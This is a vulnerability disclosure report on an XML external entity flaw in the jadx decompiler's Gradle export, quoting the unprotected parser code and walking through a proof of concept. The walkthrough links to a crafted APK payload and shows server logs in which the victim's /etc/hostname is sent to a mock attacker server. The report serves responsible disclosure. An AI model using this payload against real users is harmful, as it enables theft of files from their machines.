Improper Restriction of XML External Entity Reference in skylot/jadx
Jan 12th 2022
parseXml() function in ExportGradleProject is not secured against XXE because it does not include the disallow-doctype-decl attribute, therefore JADX is vulnerable to XXE when parsing a malicious Android Manifest when exporting Android app to Gradle. In
DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder(); Document document = builder.parse(new InputSource(new StringReader(xmlContent)));
DocumentBuilderFactory does not have disallow-doctype-decl attribute set to true, leaving it vulnerable to XXE.
Proof Of Concept
1: Build an android app with the following AndroidManifest.xml stored. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.
... [---malicious APK continued here---]
2: Open a new terminal and place in a file name malicious.dtd
3: In the same terminal as step 2, open a HTTP server (which mimics an attacker server) and leave it running
➜ ~ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
4: Now, export the APK to Gradle
jadx -e /path/to/malicious/apkfile.apk
5: The HTTP server (which mimics an attacker server will receive the contents of victim /etc/hostname
➜ ~ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 - 10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -
This vulnerability is capable of XXE (info disclosure) when users are tricked into exporting a malicious Android App with a crafted AndroidManifest file to Gradle.
If anyone is viewing the report and still wants to test this, I have moved the payload to GitHub https://github.com/Haxatron/CVE-2022-0219/blob/main/payload.apk